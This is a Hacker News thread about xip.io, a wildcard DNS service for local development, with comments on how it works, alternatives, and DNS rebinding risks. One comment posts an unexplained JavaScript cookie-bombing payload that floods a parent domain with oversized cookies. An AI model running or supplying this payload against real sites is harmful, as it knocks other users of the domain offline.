
Xip.io: Wildcard DNS for everyone - ozh
http://xip.io
======
sirn
I found its internal working quite interesting:

    
    
        $ dig 127.0.0.1.xip.io
        ;; ANSWER SECTION:
        127.0.0.1.xip.io.     403     IN     CNAME     9zlhb.xip.io.
        9zlhb.xip.io.         405     IN     A         127.0.0.1
    

Returning CNAME pointing to some record? Apparently, 9zlhb is a base 36 of
integer of 1.0.0.127.

    
    
        ip:      1.0.0.127
        dec:     16777343
        base 36: 9zlhb
    

I guess they decided to reverse the IP address to make generated CNAME scale
better (in number of characters):

    
    
                    base 36   reverse base 36
        1.0.0.0     9ZLDS     1
        10.0.0.1    2RVXTT    9ZLE2
        127.0.0.1   Z8KFLT    9ZLHB

~~~
rs
There is [http://nip.io](http://nip.io) as well, which does resolutions quite
straight forward:

    
    
       $ dig 127.0.0.1.nip.io
       ;; ANSWER SECTION:
       127.0.0.1.nip.io.	432000	IN	A	127.0.0.1

~~~
kmf
Hmm, this doesn't seem to be working for me in the same way that xip.io does.

One of my favorite features of Pow (also 37Signals, mentioned on xip.io) is
the ability to forward .dev domains to certain ports. For instance:

`echo 3000 >> ~/.pow/myapplication` gives you `myapplication.dev` as an alias
for `localhost:3000`.

xip.io seems to be able to figure that out -- myapplication.10.0.0.1.xip.io
will work, whereas myapplication.10.0.0.1.nip.io does not (just shows the Pow
page you would see for going to `localhost`).

Am I missing something here to get it to work with nip.io? I'm all for simpler
tools, but since the port functionality is 100% of what I use Pow for, xip.io
seems to be the way to go for now.

~~~
sirn
Pow has a special support for .xip.io domain[1]. If you add `export
POW_EXT_DOMAINS=10.0.0.1.nip.io pow` to `~/.powconfig` it should work[2]. I
haven't tried this myself though.

[1]:
[https://github.com/basecamp/pow/blob/master/lib/configuratio...](https://github.com/basecamp/pow/blob/master/lib/configuration.js#L77-78)

[2]:
[http://pow.cx/docs/configuration.html](http://pow.cx/docs/configuration.html)

------
Piskvorrr
Perhaps I am missing something - what problem does this solve? Instead of an
IPv4 address, you are now entering (optional) prefix, the IPv4 address, and a
postfix ".xip.io" Where is the added value over entering the IP address
directly?

~~~
bluefinity
You can set up your web server to serve different applications on different
domains if you're working on multiple projects at the same time and don't want
to put them on different ports or use subdirectories.

Another use case I can see is for testing subdomain-based web apps where you
give each customer a subdomain (really just a wildcard dns record), e.g.
acme.myapp.com

~~~
Antwan
Why not just customizing /etc/hosts then... You guys are relying too much on
3rd party tools without knowing what they do with your data and what they're
becoming in the future.

~~~
matthewmacleod
It's a DNS server. The only data they can get from you is what you're calling
the subdomains on your apps.

Yes, you could achieve the same functionality by editing /etc/hosts, but
that's a pain in the arse if you're rapidly switching between a set of
different sites, or if you want to access a coworker's machine in the same
way.

You guys are complaining too much about useful hacker-friendly tools from
well-known companies.

~~~
skywhopper
Editing /etc/hosts also requires root access, which becomes an issue if you're
running tests on a shared server that's locked down, rather than just on your
PC.

------
X-Istence
Do note, this will not work if you for example have unbound (or any other DNS
resolver on your network) setup to enforce privacy of certain addresses.

    
    
      private-address: 127.0.0.0/8
      private-address: 10.0.0.0/8
      private-address: 172.16.0.0/12
      private-address: 192.168.0.0/16
      private-address: 169.254.0.0/16
      private-address: fd00::/8
      private-address: fe80::/10
    

Here is the comment in the config file for the option:

    
    
      # Enforce privacy of these addresses. Strips them away from answers.
      # It may cause DNSSEC validation to additionally mark it as bogus.
      # Protects against 'DNS Rebinding' (uses browser as network proxy).
      # Only 'private-domain' and 'local-data' names are allowed to have
      # these private addresses. No default.
    

The reason I have this enabled is because it can help stop certain attacks
against the local network!

------
anton_gogolev
Kinda related: *.lvh.me ("lvh" as in "local virtual host") resolves to
127.0.0.1

~~~
ozh
Neat, even [http://lvh.me/](http://lvh.me/) resolves to localhost. True
generosity, you can't even know who is using the service without whois'ing the
domain

------
dsl
Heads up, these responses from external DNS servers may be blocked by some
recursive resolvers.

Allowing this on your network opens you up to
[http://en.wikipedia.org/wiki/DNS_rebinding](http://en.wikipedia.org/wiki/DNS_rebinding)
attacks.

------
sergiosgc
I always use my own resolver, with powerdns recursor, because some ISPs
resolvers are dog slow. If you have such a setup, it's really simple to set
aside a tld for development.

On the powerdns recursor configuration, tell it to authoritatively serve a
tld:

    
    
      auth-zones=dev=/etc/powerdns/dev.zone
    

And then use a BIND style zone definition file. Something like:

    
    
      @       86400   IN      SOA     ns root 1 604800 86400 2419200 604800
              86400   IN      NS      ns
              86400   IN      A       127.0.0.1
      *       86400   IN      A       127.0.0.1
    
    

Now, domains such as "newshiningapp.dev" or "imgonatakeovertheworld.dev"
resolv to 127.0.0.1.

------
moonlighter
If you have a Mac and prefer a little GUI tool, Anvil is great:
[http://anvilformac.com](http://anvilformac.com)

It has built-in support for .xip.io domains; you can configure multiple sites
by pointing it at local directories and it'll serve them up using a built-in
POW server ([http://pow.cx](http://pow.cx), also from 37signals).

Great for example for remote testing on your local LAN without having to mess
with your HOSTS file.

------
larrybolt
I can see how this would be useful for testing across-device inside your home
network, but for resolving domains for development on my macbook I prefer
dnsmasq which I set to resolve the tld .dev to localhost. [1] I'm often
commuting by bus/train so I don't have a stable internet connection at all
time so I couldn't use xip.io anyway.

For php apps the only thing I need to do currently is make a symlink, and an
apache vhost entry makes it work [2], kinda like pow! Thinking about it, I
could even make that symlink step optional, or add passenger to the mix to
support nodejs/rack apps.

[1]:
[https://github.com/larrybolt/dotfiles/blob/master/homebrew/p...](https://github.com/larrybolt/dotfiles/blob/master/homebrew/packages/dnsmash.sh)

[2]:
[https://github.com/larrybolt/dotfiles/blob/master/apache/999...](https://github.com/larrybolt/dotfiles/blob/master/apache/999-vhosts)

~~~
fs111
I usually use zeroconf/avahi for that sort of thing.

~~~
klapinat0r
Would you mind to elaborate (give an example)?

I've toyed with bonjour spoofing before, but I always found querying was
_incredibly_ difficult, using _dns-sd_ , e.g.:

    
    
       HOST=`(dns-sd -L "Name of Machine" _http._tcp local
       | grep -o "at .* (interface"
       | grep -o "[a-zA-Z\-]\{1,\}\.local" &
       ); sleep 1 && pkill -f dns-sq`
    

Obviously tailored specifically for that project, but I hope you catch my
drift. And add to that the port lookup.

I'm fairly certain I'm not using it as you do, so would you mind giving an
example of how your use MDNS for local dev testing?

------
omh
Unfortunately it looks like the entire xip.io domain is blacklisted as
"Reputation-Viruses" by the filtering service that we use.

I guess this is because it's been used by some bad guys already.

~~~
nobodyshere
Same here. Cisco filters don't like it either.

------
tedchs
I have never had this need, but if I did I would just create a wildcard under
my own domain:

    
    
      ; localhost
      * .local.example.com A 127.0.0.1
      ; e.g. if dev server is 10.0.0.1
      *.dev.example.com A 10.0.0.1
    

Hence, no 3rd party dependencies.

------
EmielMols
Used this often and it's a fine service. One feature request: it would be
great if they'd chip in a wildcard https certificate (and publish it including
private key), so it could be used for https on (local) development setups.
This would require supporting an additional naming scheme that only uses
single-level subdomains.

------
jops
A word of warning for any UK based BT customers: xip.io doesn't work on BT
Home Hub 5! I recently upgraded to the 5 from a Home Hub 3 (which it worked
fine on), but had to send it back because of this. The 'BT tech experts'
couldn't give an explanation. Has anyone else had the same issue?

~~~
janfoeh
No, but I had the same issue just last week working on premise at a customer.
Standard Fritzbox wifi AP, as far as I could see.

Switching to Google DNS (8.8.8.8) temporarily fixed it.

------
derefr
Dang; and here I was hoping it was going to be a dynamic-DNS host that also
issued free N-level wildcard SSL certificates (e.g. you.example.com,
_.you.example.com,_.*.you.example.com, etc.) That's one thing you won't get
from StartSSL.

------
pwenzel
I use VirtualhostX on my OSX machines, which includes automatic xip.io URLs.

[http://clickontyler.com/virtualhostx/](http://clickontyler.com/virtualhostx/)

Xip.io is enormously useful if you are testing on virtual machines or mobile
devices.

------
hackerboos
I know it solves both this and a slightly different problem but I think
[https://forwardhq.com](https://forwardhq.com) is pretty cool albeit not free
solution.

~~~
larrybolt
This looks like what ngrok/localtunnel does, but free and opensource.

~~~
hackerboos
This one supports SSL.

------
gdne
I just use charles (charlesproxy.com). Does everything this does and 15
bazillion other things too. Works with mobile devices and anything that can
set an HTTP proxy.

------
lewisflude
This is from 2012, when Basecamp were still 37signals.

~~~
babuskov
HN discussion at that time:

[https://news.ycombinator.com/item?id=4081591](https://news.ycombinator.com/item?id=4081591)

------
alexanderri
function run() { var base_domain =
document.domain.split('.').slice(-2).join('.'); var pollution =
Array(4000).join('x'); for(var i=1;i<99;i++){
document.cookie='x'+i+'='+pollution+';Domain='+base_domain+';Path=/'; } }

------
saddestcatever
I really like the service, however it desperately needs a better tutorial /
how-to for the first time user.

------
claudius
Is it just me or does anybody else also find it really annoying that the
blinking cursor there (behind the “everyone”) is not actually a cursor and one
cannot delete text with backspace?

------
alecsmart1
Am a little lost. Why cant we use hosts file instead? I would understand if it
was complicated. But add entries to hosts is super simple and definitely
requires no special knowledge.

~~~
Lutin
As binarymax mentioned[1], it's very useful when you want to test on multiple
devices where editing the host file would be undesired or not possible. This
includes mobile devices or computers that are not your own or that you don't
have administrative access to. It's also easier to just share a link instead
of asking people to change their hosts file just to test a part of a site.

[1]
[https://news.ycombinator.com/item?id=7732756](https://news.ycombinator.com/item?id=7732756)

------
nXqd
does it work with local ip address with port ?

~~~
wprl
It's just DNS, which doesn't bring port into the picture. A domain name
resolves to an IP address separately from whatever ports the server at that
address might listen on.

~~~
fulafel
SRV records do ports.

------
moondev
This is great.

------
cwh
or just configure your environment correctly.

------
anilyeni
i can only use it somewhere i cannot use ip address directly but domainname. i
couldnt remember any configuration file like that.

